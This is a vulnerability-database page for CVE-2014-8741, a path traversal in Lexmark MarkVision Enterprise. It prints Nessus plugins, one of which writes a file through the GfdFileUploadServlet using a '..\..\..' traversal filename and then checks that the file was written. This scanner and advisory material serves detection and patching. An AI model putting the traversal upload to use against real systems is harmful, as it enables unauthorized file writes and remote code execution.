Vulnerabilities > CVE-2014-8741 - Path Traversal vulnerability in Lexmark Markvision Enterprise

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
lexmark
CWE-22
critical
nessus
exploit available
metasploit

Summary

Directory traversal vulnerability in the GfdFileUploadServerlet servlet in Lexmark MarkVision Enterprise before 2.1 allows remote attackers to write to arbitrary files via unspecified vectors.

Vulnerable Configurations

Part Description Count
Application
Lexmark
1

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Relative Path Traversal
    An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
  • Directory Traversal
    An attacker with access to file system resources, either directly or via application logic, will use various file path specification or navigation mechanisms such as ".." in path strings and absolute paths to extend their range of access to inappropriate areas of the file system. The attacker attempts to either explore the file system for recon purposes or access directories and files that are intended to be restricted from their access. Exploring the file system can be achieved through constructing paths presented to directory listing programs, such as "ls" and 'dir', or through specially crafted programs that attempt to explore the file system. The attacker engaging in this type of activity is searching for information that can be used later in a more exploitive attack. Access to restricted directories or files can be achieved through modification of path references utilized by system applications.
  • File System Function Injection, Content Based
    An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attackers' program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.
  • Using Slashes and URL Encoding Combined to Bypass Validation Logic
    This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
  • Manipulating Input to File System Calls
    An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

D2sec

nameLexmark MarkVision Enterprise 2.0 File Upload
urlhttp://www.d2sec.com/exploits/lexmark_markvision_enterprise_2.0_file_upload.html

Exploit-Db

descriptionLexmark MarkVision Enterprise Arbitrary File Upload. CVE-2014-8741. Remote exploit for java platform
idEDB-ID:35776
last seen2016-02-04
modified2015-01-13
published2015-01-13
reportermetasploit
sourcehttps://www.exploit-db.com/download/35776/
titleLexmark MarkVision Enterprise Arbitrary File Upload

Metasploit

descriptionThis module exploits a code execution flaw in Lexmark MarkVision Enterprise before version 2.1. A directory traversal vulnerability in the GfdFileUploadServlet servlet allows an unauthenticated attacker to upload arbitrary files, including arbitrary JSP code. This module has been tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.
idMSF:EXPLOIT/WINDOWS/HTTP/LEXMARK_MARKVISION_GFD_UPLOAD
last seen2020-06-10
modified2017-07-24
published2014-12-27
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb
titleLexmark MarkVision Enterprise Arbitrary File Upload

Nessus

  • NASL familyCGI abuses
    NASL idLEXMARK_MARKVISION_GFDUPLOAD_RCE.NASL
    descriptionNessus was able to exploit a directory traversal vulnerability in Lexmark MarkVision Enterprise, within the
    last seen2020-06-01
    modified2020-06-02
    plugin id80554
    published2015-01-15
    reporterThis script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/80554
    titleLexmark MarkVision Enterprise GfdFileUploadServerlet RCE Vulnerability
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(80554);
      script_version("1.8");
      script_cvs_date("Date: 2019/11/25");
    
      script_cve_id("CVE-2014-8741");
      script_bugtraq_id(71623);
    
      script_name(english:"Lexmark MarkVision Enterprise GfdFileUploadServerlet RCE Vulnerability");
      script_summary(english:"Attempts to exploit the vulnerability.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web application is affected by a remote code execution
    vulnerability.");
      script_set_attribute(attribute:"description", value:
    "Nessus was able to exploit a directory traversal vulnerability in
    Lexmark MarkVision Enterprise, within the 'GfdFileUploadServerlet'
    servlet, to upload a file to the remote host. A remote attacker can
    utilize this vulnerability to both upload and execute arbitrary code
    with SYSTEM privileges.");
      script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-14-410/");
      # http://support.lexmark.com/index?page=content&id=TE666&locale=en&userlocale=EN_US
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f4db861a");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Lexmark MarkVision Enterprise 2.1.0 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"d2_elliot_name", value:"Lexmark MarkVision Enterprise 2.0 File Upload");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Lexmark MarkVision Enterprise Arbitrary File Upload');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2014/12/09");
      script_set_attribute(attribute:"patch_publication_date", value:"2014/12/09");
      script_set_attribute(attribute:"plugin_publication_date", value:"2015/01/15");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:lexmark:markvision");
      script_end_attributes();
    
      script_category(ACT_DESTRUCTIVE_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("lexmark_markvision_enterprise_detect.nasl");
      script_require_keys("www/lexmark_markvision_enterprise");
      script_require_ports("Services/www", 9788);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("install_func.inc");
    
    get_install_count(app_name:"lexmark_markvision_enterprise", exit_if_zero:TRUE);
    port = get_http_port(default:9788);
    
    install = get_single_install(
      app_name : "lexmark_markvision_enterprise",
      port     : port
    );
    
    dir = install['path'];
    
    filename = "/..\..\..\apps\dm-mve\nessus.txt";
    
    r = rand_str();
    
    boundary = "---------------------------nessus";
    postdata =
        '--' + boundary + '\r\n' +
        'Content-Disposition: form-data; name="success"\r\n' +
        '\r\nsuccess' + r + ' - $fn\r\n' +
        '--' + boundary + '\r\n' +
        'Content-Disposition: form-data; name="failure"\r\n' +
        '\r\nfailure\r\n' +
        '--' + boundary + '\r\n' +
        'Content-Disposition: form-data; name="datafile"; filename="' + filename + '"\r\n' +
        'Content-Type: text/html\r\n' +
        '\r\ndelete me - ' + r + '\r\n' +
        '--' + boundary + '--\r\n';
    
    res = http_send_recv3(
      method: "POST",
      item: dir + "/upload/gfd",
      port: port,
      add_headers: make_array("Content-Type", "multipart/form-data; boundary=" + boundary),
      data: postdata,
      exit_on_fail: TRUE
    );
    
    exploit_req = http_last_sent_request();
    
    # >success - "nessus-1421070914970.txt"<
    item = eregmatch(pattern:'>\\s*success' + r + '\\s*-\\s*"([^"]+)"<', string:res[2]);
    
    if(isnull(item))
     audit(AUDIT_WEB_APP_NOT_AFFECTED, "Lexmark MarkVision Enterprise", build_url(qs:dir, port:port));
    
    filename = item[1];
    
    res = http_send_recv3(
      method: "GET",
      item: dir + "/" + filename,
      port: port,
      exit_on_fail: TRUE
    );
    
    if("delete me - " + r == res[2])
    {
      if(report_verbosity > 0)
      {
        snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
        report =
          '\nNessus was able to verify the issue exists with the following ' +
          'request :' +
          '\n' +
          '\n' + build_url(port:port, qs:dir + '/' + filename) +
          '\n' +
          '\nNote: This file has not been removed by Nessus and will need to'+
          '\nbe manually deleted.' +
          '\n';
        if (report_verbosity > 1)
        {
          report += '\nThis file was created using the following request :'+
            '\n' +
            '\n' + snip +
            '\n' + exploit_req +
            '\n' + snip +
            '\n';
        }
        security_hole(port:port, extra:report);
      }
      else security_hole(port);
      exit(0);
    }
    else audit(AUDIT_WEB_APP_NOT_AFFECTED, "Lexmark MarkVision Enterprise", build_url(qs:dir, port:port));
    
  • NASL familyMisc.
    NASL idLEXMARK_MARKVISION_ENTERPRISE_2_1.NASL
    descriptionThe version of Lexmark MarkVision Enterprise installed on the remote host is prior to 2.1.0. It is, therefore, affected by the following vulnerabilities : - A remote code execution vulnerability due to improper handling of user input to the
    last seen2020-06-01
    modified2020-06-02
    plugin id80203
    published2014-12-22
    reporterThis script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/80203
    titleLexmark MarkVision Enterprise < 2.1 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(80203);
      script_version("1.7");
      script_cvs_date("Date: 2018/11/15 20:50:23");
    
      script_cve_id("CVE-2014-8741", "CVE-2014-8742");
      script_bugtraq_id(71623, 71625);
    
      script_name(english:"Lexmark MarkVision Enterprise < 2.1 Multiple Vulnerabilities");
      script_summary(english:"Checks the version of Lexmark MarkVision Enterprise.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web application is affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of Lexmark MarkVision Enterprise installed on the remote
    host is prior to 2.1.0. It is, therefore, affected by the following
    vulnerabilities :
    
      - A remote code execution vulnerability due to improper
        handling of user input to the 'GfdFileUploadServerlet'
        servlet. (CVE-2014-8741)
    
      - An information disclosure vulnerability due to improper
        handling of user input to the 'ReportDownloadServlet'
        servlet. (CVE-2014-8742)");
      script_set_attribute(attribute:"see_also", value:"http://support.lexmark.com/index?page=content&id=TE667&locale=en&userlocale=EN_US");
      script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-14-411/");
      script_set_attribute(attribute:"see_also",value:"https://www.zerodayinitiative.com/advisories/ZDI-14-410/");
      script_set_attribute(attribute:"see_also",value:"http://support.lexmark.com/index?page=content&id=TE666&locale=en&userlocale=EN_US");
      script_set_attribute(attribute:"solution", value:"Upgrade to Lexmark MarkVision Enterprise 2.1.0 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"d2_elliot_name", value:"Lexmark MarkVision Enterprise 2.0 File Upload");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Lexmark MarkVision Enterprise Arbitrary File Upload');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2014/12/09");
      script_set_attribute(attribute:"patch_publication_date", value:"2014/12/09");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/12/22");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:lexmark:markvision");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Misc.");
    
      script_copyright(english:"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.");
    
      script_dependencies("lexmark_markvision_enterprise_detect.nasl");
      script_require_keys("www/lexmark_markvision_enterprise");
      script_require_ports("Services/www", 9788);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("webapp_func.inc");
    
    port = get_http_port(default:9788);
    
    appname = "Lexmark Markvision Enterprise";
    
    install = get_install_from_kb(appname:'lexmark_markvision_enterprise', port:port, exit_on_fail:TRUE);
    version = install['ver'];
    fixed_ver = "2.1.0";
    
    url = build_url(port:port, qs:install['dir']);
    
    if (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, appname, url);
    
    if (ver_compare(ver:version, fix:fixed_ver, strict:FALSE) >= 0)
      audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);
    
    if (report_verbosity > 0)
    {
      report = '\n  Installed version : ' + version +
               '\n  Fixed version     : ' + fixed_ver +
               '\n';
      security_hole(port:port, extra:report);
    }
    else security_hole(port);
    

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/129886/lexmark_markvision_gfd_upload.rb.txt
idPACKETSTORM:129886
last seen2016-12-05
published2015-01-12
reporterAndrea Micalizzi
sourcehttps://packetstormsecurity.com/files/129886/Lexmark-MarkVision-Enterprise-Arbitrary-File-Upload.html
titleLexmark MarkVision Enterprise Arbitrary File Upload